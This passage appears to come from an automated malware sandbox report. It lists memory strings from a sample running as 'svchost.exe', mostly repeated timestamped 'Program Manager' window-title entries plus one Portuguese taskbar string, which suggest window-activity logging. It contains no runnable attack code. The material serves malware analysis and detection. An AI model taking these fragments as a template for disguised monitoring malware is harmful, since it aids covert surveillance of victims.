              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/20 | 21:32:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:00:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:21:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:56:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:28:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:06:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/20 | 21:42:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:06:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:40:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:21:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:43:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:12:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:31:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:08:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:51:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:10:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:59:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:25:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:41:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:40:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:59:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:30:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:32:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:38:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:55:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:07:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:51:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:31:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:54:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:04:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:16:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:42:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:53:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:14:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:20:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:10:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:12:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:59:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:22:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:18:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:34:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:42:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:44:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:30:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:42:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:03:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:53:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:44:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:42:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:31:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:11:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:26:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:28:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:36:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:50:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:38:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:36:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:46:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:25:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:24:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:10:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:33:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:37:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:58:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:12:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:47:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:41:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:32:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:47:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:40:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:57:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:15:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:40:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:28:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:11:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:36:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:16:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:59:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:03:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:46:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:17:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:06:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:38:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:56:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:59:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:03:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:09:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:23:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:12:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 09:12:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 03:52:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:04:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:58:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:42:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:15:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:24:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:20:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:06:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:03:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:31:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:42:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:33:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:48:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:34:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:56:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:18:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:58:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:05:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:26:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:17:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:48:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:23:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:14:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:57:53 - Program Manager
              Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.drBinary or memory string: Shell_traywnd+MostrarBarraDeTarefas
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:42:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:37:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:42:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:01:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:48:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:50:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:02:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:50:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:51:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:56:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:35:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:04:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:35:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:53:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:49:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:04:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:12:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:12:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:09:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:32:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:45:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:20:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:14:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:07:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 09:03:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:40:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:19:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:39:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:21:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:23:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:21:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:46:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:25:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:38:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:38:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:37:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:29:35 - Program Manager
